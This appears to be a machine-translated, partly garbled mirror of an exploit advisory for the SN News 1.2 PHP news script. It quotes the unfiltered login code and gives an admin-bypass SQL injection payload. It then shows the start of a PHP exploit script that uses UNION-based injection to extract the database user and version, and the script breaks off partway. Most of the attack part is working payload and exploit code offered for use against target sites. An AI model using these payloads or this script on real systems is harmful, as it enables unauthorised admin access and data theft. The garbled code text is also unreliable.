SN News <= 1.2 management rights authentication bypass and injection-vulnerability warning-the black bar safety net

2012-06-13T00:00:00
ID MYHACK58:62201234103
Type myhack58
Reporter 佚名
Modified 2012-06-13T00:00:00

Description

SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability

Impact of version 1.2

Download address: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news

The author is not any harm to the responsible

########################################################################

The defect is located- /admin/logar.php [4-15]:

4.$ login = $_POST["login"];

5.$ senha = $_POST["senha"];

6.$ sql = "select * from news_adm where login='$login' AND senha='$senha'";

7.$ query = mysql_query($sql);

8.$ nr = mysql_num_rows($query);

  1. if($nr>0){

1 0.$ _SESSION["admin"] = "on";

1 1. echo "<script>

1 2. location. href='../'

1 3.& lt;/script>

1 4.";

1 5.}

Comment:

As you can see there is no validation or any filter to variables $login and $senha.

See line 6, so you can inject sql query by using $login and $senha variables.

SQL Injection PoC:

http://www.xxx.com /sn_news/admin/login.htm

Login: 'or '1'='1

Senha: 'or '1'='1

This injection will bypass the admin login screen.

Title: SN News < = 1.2 SQL Injection

<? php

/*

Example:

$ php mnews.php http://www.xxx.com /scripts/mnews/

*/

error_reporting(E_ERROR);

set_time_limit(0);

@ini_set("default_socket_timeout", 3 0);

function hex($string){

$hex="; // PHP 'Dim' =]

for ($i=0; $i < strlen($string); $i++){

$hex .= dechex(ord($string[$i]));

}

return '0x'.$ hex;

}

echo "\nSN News <= 1.2 SQL Injection exploit\n";

echo "Discovered and written by WhiteCollarGroup\n";

echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";

if($argc!= 2) {

echo "Usage: \n";

echo "php $argv[0] <target url>\n";

echo "Example:\n";

echo "php $argv[0] http://www.website.com/snnews\n";

exit;

}

$target = $argv[1];

if(substr($target, (strlen($target)-1))!="/") {

$target .= "/";

}

$inject = $target . "visualiza. php? id=-0'%2 0";

$token = uniqid();

$token_hex = hex($token);

echo "[*] Trying to get informations...\n";

$infos = file_get_contents($inject. urlencode("union all select 1,concat(".$ token_hex.", user(), ".$ token_hex.", version(), ".$ token_hex."), 3,4,5-- "));

$infos_r = array();

preg_match_all("/$token(.)$ token(.)$ token/", $infos, $infos_r);

$user = $infos_r[1][0];

$version = $infos_r[2][0];

[1] [2] next